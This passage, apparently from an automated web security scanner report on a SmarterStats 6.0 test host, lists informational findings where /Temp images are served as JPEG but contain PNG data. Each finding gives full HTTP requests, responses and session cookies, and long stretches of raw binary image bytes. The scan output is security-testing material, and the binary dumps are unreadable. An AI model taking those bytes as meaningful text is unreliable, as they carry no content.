.MlrN...L...L .e`..eJ.9.6%..1*..All..lO....'..m7..E}.C..Pe-S...sU........~....rd..A1V..1^.l.#lM..d<..|l...x.Qf.v(g{r..BG......e
.Mh.3...:.............@..|.l.'U..>....T..{....."l...rQ......-%Q0aS:|...Lg.....b...c...0G..y.:1;tJtW...Y=oZF.\....7...firvR...*.....Z.h.......U?.*.6-.n~>\o.....=p.z`gg....5..q..M..O}.>.v.$-"l.h...e...-..-.....$..._.!\.N.......<.....s&l.6..I..d....._..L...O.    [.............vP...y..#.....J...B....&l.S.{......v/L.....=&l...*l.B..+..%
.Mh....V..#......0..rd..a..8r[.}y[..z...Z........    .M_rYXuV.Lx;(.j.<...s...Gr.....Ta.....d..<...m.U.:*K&.2..P...pY.a..Y.I-.E.^U.-Q lj...<..a......^.0....6(...v.*k.B....(%Q0a..*..tV.Lx;(.j.<...s...Gr.-p[.D....a............1T..!\.d.#l.FR. l.a..:a.........Iy29.y8F..<B...s...Ib...v...d
..h.Yk....M^.XXuV.Lx;(.j.<...s...Gr......6~.N....&.9....dr .`...y..%......."=...u..).    ....D...]..M'...@.......-O...6O'.U....TaK....,g8..u....ay.W.9..'.........Z.....u..'...o..f:+G&...c5`.....9...#......["Yk....m..AGe..@f..*....K2..6K#.Ez.......).    ...    [.@....t.N......1R...Z.\.#l.N......Ua.......KI.....5..Ug.....b...c...0G..}$.@...D..Z.G.Mns.MGe..@f..*....K2..6K#.Ez..]..-S.......<...]..M'...@.......-O...6O'.U...+./wM...]...$
.MlrN...L...L .e`..eJ.9.fj%.L.a.K..L..i.r..XX..{...w{5..|x................-O0a..*..tV.Lx;(.j.<...s...Gr...v...d
y...[..(.6...>..,...,.CE`..eI.9.fi$.H.a.S..L....Wa.........Iy29.y8F..<B...s...Ib..-pJ4..5qD..&.i,.:+G&...c5`.....9...#.F.a.c..e
}..}u..'.6...6..%....c...C.,.0G.,...."l.X.-Q....*k..aS..    .N......1R...Z.\.#l.N.....;TY....}o..<...M.)Q..)...    d.....L.0G.L...A...a{..Ta....=..n]2....,.V.G.
.UR.<..X..`....r$o{2...h....\......_(.B.....Z.....o|i..M .|...I.S......=><u.#l......h.lMs.L...:..........*ly""lW\Y......6.).#..]...@6.>.9..'.............`.a.]..e
}..G..8F..U...L.
../..d.&....+oQ...m.-?_2.....+...c.v.._x..)c...../*.c.v_z..K.X..Y~A...]....F.m..m...[d..]u..'".......)Ta..%..L.
...xQ..M".=......T..i....3...T..Iy4a..s....M..M.^>.t.h....d.sY.h.uV..[`.)....Y....k...\u.U....z......5..k..6`..S.....3..)......CO5W.d...y..!......0..3..|..a.4.......H......l...5....b.....N...S............s..f.......z1~    ..... ...0a.. ...@....@~.......B.@.................@....@~..[.}..B...... .....5o.....W....5.}...b..hzQ.x3...n.^...{..G.I..<..&p..3z|...:..5.....?n............6,..W....{.).*...r........./.y..2......|Y..-..p...S|.....G]&l=.....h.+.6..].........|.:];...+.......6.......4Qk.v l..i.r..OU...w^u..G..!^p}_cA|....:._.XoLv..m..)...U{o...^%v....[Y.u.a;EK...    ...'..U...b......qz.....S.L....N.-7K...-....c...m......Aw...c.}....,m..?=......>.........g.)Q.m.].+.&.....L....X.3a[>..E.....}...[../qT..?..L.V....Oj.....L.=|8x.~@...}...L3.a~x...e#?&l..........>. ...@...85.&l.FH..@...... .\...r.R...... .......vj..... ...@...%..-./.!...@......     l.FH..@...... .\...r.R...... .......vj..... ...@...%..-./.!...@......     l.FH..@...... .\...r.R...... .......vj..... ...@...%..-./.!...@......     l.FH..@...... .\.....Q.n.o.....IEND.B`.

10.28. http://vulnerable.smarterstats.6.0.host:9999/Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG

10.29. http://vulnerable.smarterstats.6.0.host:9999/Temp/78969dd70ff94762832f8dc8e7f76105.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/78969dd70ff94762832f8dc8e7f76105.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/78969dd70ff94762832f8dc8e7f76105.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:24 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 6302
Connection: Close

.PNG

10.30. http://vulnerable.smarterstats.6.0.host:9999/Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 16586
Connection: Close

.PNG
..........W........,..>.}..(l.Xk.gC.x..%....]i..Z....../0h....g...-.L._......(..;.x.?.&7..VM.%......?...k.C...._....CpN3....o.y.o.<.?.......v...Y.........n..]|.F..(.    .3.0V}.....h....2.j...-k..x.=p?...T[........f..y...(lN...I.z.....%.......o..............bUo%l......$.    >.-...zq..Q.c...`..F.Z..1E.t..f.    [m.T......>..QU..b[.-3V.w..........!    P..Y-.)_&.w{...n.o)Yax.A..G.+8...V.....N...9>.{....k..v..'d...4.K{.S....E.......+l..[....>..W.{........9*lj|....X....R.|..x.>D`A.    .E.....Q........-.....h...........p#....'..._a_.O.....5..i.o0{.......>.....v.m....?.)......g .`9.....~.....
"v5./....U4Q....1j..{i?....6.-...............sq.m.h..o.+>o...P.|..x.F'...y....K..\uQ-......W.G..%8..E`+....M....-..m.N...yj......%S......OV+o.mx...Fi..~".....[.i........1H....s..9/?.y...l....8..&a..|5.o...!....ko.w...........D.......+..l.j]....p.-Y.uKE..EEh7l.ng.I.J..50Pc.n-k.Kq...t......mS.p.M....~..5j..e.bk..j.F..&..sb.&l"o..w.f..K........}.E;.#/.1..{.VE.._..)l../._..f..g..G@.L..ji..k/1.......{?.....&.j.:llwO.%...,x....-
.X..#.....s........q.&l.7..dND........9.=/[F..;V..u.6I.P..~.p.....O......$.....):h.%0......._..m......}X....?.{z....)...w.....Xc....IV..{....s...7`B..6.V*..}.zg..U...*a...:.7R>A..    .2Cea.3.a.....I...9....:t.U.8....Q....j....D..~..%y0    8A....4.....H..1.#................c.a...`.Z\.q...~veM2m..>..6...x..."i...j..hBV:.T.t..E.    ....~n.b..LM..f..e..E..-.d.......0h3~=Rf.Ma.(.........p.(.[...K..&@a3u..p.$.$8=....e..|.C..0..`...h48.%._.v.`..M]u    ...?......c.k..i    P.L[.,..    .M.E...v.M........3.......q..`.k.a.c....-.R.....O..%@a3m..`.&.........oT..0.....bZ.P%l.[;d...vvC.g;.a...;^..LK..f..e..M.......d]..W.zl#..1..`x.E4.....U.).M....veM...............5..y.....dy.`
......b......j..]oZ2..Q..q..W?jxq....Y..YD...Xy.........V......`..g.!(,...f.Z-d=:........>.xe.p.....j|.    .$PP\....u    [.-:*.2...Z.......N.......C?....8.H.S..H...!@as...C.:    .......T.&}.K..[4$.a4.Ak.......Y    ..w-...........q?.r.:?.x.    8K...,9...t.._q.m..t    .......a<....E..S...g..vz...zsqC.....4.0. .g    P..%....N../.D...t    .K..cL....2.8!......=..l..K..L......4.0. .g    P..%..........Et.m...M_0.. $...Y...T...A...C...)...w.<<..H....6g..=$. ...Eh..KW.......d.aL..$.B..9..;....}te..,x...j&)_$@.n'@as;b^...._.F.ai....]i...s.]+A...Q......    c..A..%.z....mE1...3;....    x......y    ...o..A.i..
.t.....J...e.<8..K....C..:.^.~.?
..%.C..F.."@a..h^....]B.q...M.lcU.h..6.1..Xw.M.%...%l...#.|".y]..g....=s.`..    x....C.y....O..@..b].....El..00.W....1...`s..Wu....V...|..U>.$@.."@a..h^....#..$.....Dd.0...m.:....;J.|=....a...........H...(l...K...|.hx..,../...
...B3>G..E(..& .....yK..1...1....
.w....&.h.M..Q..-..S?B.a3U.m.... ...a.......c."...(.
.Gq.b$.8.e...lQ..2...G.vL...........Y..<
#..\>.G..H...(l.......p8..}..v\e..A...4...........m...*...A..1.../....
......&.h..u...d%+.c3......:....,..P.../..5..k..,....(l......    8.e..tGe|...W..g./v.B".)Y.k.P..........(....U....A..f.j.MX...Y..S.c..-Ii3....I..%Cp..8C..{..5.]..'..l4..6.....R.....2.1..1.. b..4..._.Rc....3r...5..f..%....(l.....5.H....ttM8.k.....\....2........2.w..7^....[P...5.L.5w5..G.Ki`..6.W.o...
.K.<t.na{%.<..\.4...t..    I...U..7Vd....q.Pk|....'@a3~...-@`..\t.vP..M...9W..g0y.e4...g.BpGI.!B...2n....(.~...;.<.,"    ............._..........F...3v_c..A....8|...L.~.._sM.....p.(."O!.I..&@a3v...,D`m^1ZO..;../.<.w\.L%,.c3.7g..&.....6....MwW.....G.5........    P..]?.;...3-..g.....V^.2l..0..`..+h=f..W.....^    l..nY....D..'...x.[...[.{.Y\.0..
....wda..o...G.F.%.tK..u.0'.O..3x?........H..$...!.eM.B.g=.+.K.'.......$n..a.'.E'.....y..x.$P...M..0i.na..l..J..]c.......nX$.(a.X...u..*.v%...S^..&...*...j!...H...(l.g.+.@..dm..QY..wB.....sm....b..A....f.h%l...Y.W.zkzf.J.M.m.u...H...(l.........5.j...f..W...8..JX..e..."Z.M..;.2....u..8..^7u............9..6*..d\.d.........H...N..Vw.<.    ......J...i.0[u........F.}.n#f(Y.qO......-k.];..8.....-..m.r..~.1......!...w.."...
...    .....ch...x6.6......00.^S.a.....3\.[_tH.n-k..s.;.$....m..cs...k.....o.....x...P.....I....0k.......l.L.H..<.Q...........0.).....W....V....zu.L ...3...mQ....d..u..Qea........e..=..R.....i..L.{.C.....?.xy=.(lz(....".on..........&Y...7..e...ct...o....Twd].AY...N.<..\>Y....6.6.7{...|...T..U'i.2/...k.)..d.]......=.(l......K    ..r..B.9.>.d..[{I..-...0(...y.=AM@8:.N............p.T.K..t.J..t.z|.R-....m%*..u.....V=.,.Fasi3...@.....<%    ....[W....M.l..0.......I.....xHVnG.e.......y.h..9e2..._`...\.'...x........(l......B..D...J.;..........(l...s...    D......:.5*.....HP..E.o0..`...h94._.....s..1%x..".*[.H\....m.vsk...K..I.....=....c..a.D...n @as.T....I.Yi{u...Q..(m.........j9....B.qN.....8.X-.a.W..*....DE...B.qj...f..%.c....,Q.
.%...4..q...>&..L..).1]m....M...t..D...J.....f....!..o.....&..[........V...,....Y......,Q.V    O....6.`.EH....-...3.9,m..U...XRp.a0........8.c2pR./...O....``.*.Kj3...,d...H..|.......wL.....6...K..0.. bc1:..ql..Z.H.6r.......C..f..dI,J...6l.emL...7..b.n.....>._."o;_shb.M..nPf.,...b.....L...X.@].m@.d..JX..`...u..JE....)[We.vJ.n.k..Yc7.e?.Xp......2Y.......la.~.^.....k...D..M>.%...f......|...iY;5...O0..3...@U..6.    .0...U........l.&...W..%..qcx.....1x.%.L....G;,lW.5.e.D.6.B........LF mo1..g!0.S..m...#b...~.%...".].,.b..f#Wb..........8./3k&{.Y.......        ..../t.....$A.|w.Em.....dx.......@..3..M./@IJ.Z.....(...>IS..."..0..
.....".R..a..zt.;.T..&.!......,.....)..9lKI.u.i.a..Vk.mlWm.^...&=.+.K..I..LJ..f..e.H@.|s.{t..B...u.6.&}?...J....0\. f.U.O...Y5.V....KG..W....K....'...'..I..LL..f..e.H@....7.r.z.V.'#....%..;.`../.u`0U.........K.....8.tw.....qjA'...G..,@..f.Jf.I@...+F..uu.".y{{.E....V+ia.g...
}....m...n.L|...NN~..v.`.&.....
.E*..$.! ..:Ed `.n..;5u....DSv^.&%.9.%....r.BX.....w-.e!|D_..t..5    ....P.,T.,*    ....t\e...5..K$B......S..._1.........DMf.....>..q..e6f. .....Y..Y\...8~..Z.MG..|.H.-C4|.em.]..[..?ad.....z.f..k....F....Kl.$@..%@a.h...$ .dB....Z..K|...C.D.......C7...W..e.7.....}Y...#..:.Lh..#.._.H...K..f..g.I...dn.....#.k..:".z..-....J....'o."..w........y..P.g(u".P.H..H...6@.$PN e.i..M..D........c"o.u...WJ.|#.^..^.../t...(.9...#h<b5d.!_$@.$`#@ac[ ...D@.......4..v.-.VQd$.6*..L...u.f|x..!...TFp...|..-......#..d.:.....o.....H..*....A..    TK........m.......n.ef..K.M..._A|.u$.P..N.G.D...r..M%.k.Z......7..I..H.Z..66.. .Z    .....7i.....=YzK-...~Y..I;...YvD.g.W]<A..}W.}...E..!    ..=..6{..{. .....d...]...r....G3Q.
.Q....."..p.....j|.    X.....^{.O...?b....5.`...z,8.I....QcF.....N.N...9    .o#....5.V.....5.:n.9r.....2.V...M..4Mr9...O.O.....9...$..(# ..I....d..o.D.]...].d.[.<>9$U.B...|LH..\A...
.<.    ..F@...|..&*....m....w..w.-#w.....b..y...|(H..\I...J.<.    .@9..2.y...[*o.7.ut.....F..k.).O........SD.b3....[l.$@.$....6.`.II.....y.<F/..2P"9.C7jY...
.}*..$S....O..N.......L".|..    ...    P..M..'.....HNAq....3-....D[._.~...B."I....5.."."g".....M..La...!.
.E.$@..&@a.4q^..H.Z.......1..zE.D.$.%.$..4.R]."UU..M.+.+.Y.<..*frm.I.3.J.H..H...(lF....    .@..$.%.$..D..+R..j<..B......2.U.c.....    ../....B-..I..H..H..,M..f..g.I..H..H..|.....j..H.$@.$@.$`i..6KW?.O.$@.$@.$...(l.PK.G. .. .. .K...Y..Yx. .. .. ._ @a..Z.=..    ..    ..    X..........    ..    ..    ...
./.....H..H..H...(l..~...H..H..H...P.|..x.$@.$@.$@..&@a.t...$@.$@.$@..@......{$.. .. ...4.
.....'.. .. ......6_.%.#    ..pa.....}UYT.yM'?. ...q..6..@.>    X...a.....-...%..0..
..j.e!.3..#l...C.}..>-J.r..u-..}.....I.l$@.&$@a3a..H$`J..    .fhw.P.Uj.&.B....P..T.,+    .2.M.lY....m.Q.J3n..j...H..|.....+..L..$P......Z.%z....M..&._&@a..........U..YI.....Vb....    ...
..U.o..,J....M8.e.8{....&..&@a.......u.8*l..e]m.Dm/....Q.4.....B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK.....:x.H.s....IEND.B`.

10.31. http://vulnerable.smarterstats.6.0.host:9999/Temp/8494271a59234d898cdd787b473092ed.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/8494271a59234d898cdd787b473092ed.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/8494271a59234d898cdd787b473092ed.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 13037
Connection: Close

.PNG

10.32. http://vulnerable.smarterstats.6.0.host:9999/Temp/869b700a3e8b4973a5fdd0981173fbce.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/869b700a3e8b4973a5fdd0981173fbce.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/869b700a3e8b4973a5fdd0981173fbce.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG

10.33. http://vulnerable.smarterstats.6.0.host:9999/Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG

10.34. http://vulnerable.smarterstats.6.0.host:9999/Temp/91331a080c0148b0bddd5d75991acb5b.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/91331a080c0148b0bddd5d75991acb5b.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/91331a080c0148b0bddd5d75991acb5b.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 9872
Connection: Close

.PNG

10.35. http://vulnerable.smarterstats.6.0.host:9999/Temp/9b829667b5214dbb92b4f41517bde32f.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/9b829667b5214dbb92b4f41517bde32f.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/9b829667b5214dbb92b4f41517bde32f.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB92FEF80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG

10.36. http://vulnerable.smarterstats.6.0.host:9999/Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG

10.37. http://vulnerable.smarterstats.6.0.host:9999/Temp/AboutThisFolder.txt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/AboutThisFolder.txt

Issue detail

The response contains the following Content-type statement:
Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Temp/AboutThisFolder.txt HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Temp/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB66497A424400"
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 61
Connection: Close

...This file is necessary to aid the creation of this folder.

10.38. http://vulnerable.smarterstats.6.0.host:9999/Temp/a1b92ef93b1b4be78245313c2d051569.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/a1b92ef93b1b4be78245313c2d051569.jpg

Issue detail

The response contains the following Content-type statement:
Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/a1b92ef93b1b4be78245313c2d051569.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 10437
Connection: Close

.PNG

10.39. http://vulnerable.smarterstats.6.0.host:9999/Temp/a61092b27bce47aa8accac88254b740c.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/a61092b27bce47aa8accac88254b740c.jpg

Issue detail

The response contains the following Content-type statement:
Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/a61092b27bce47aa8accac88254b740c.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
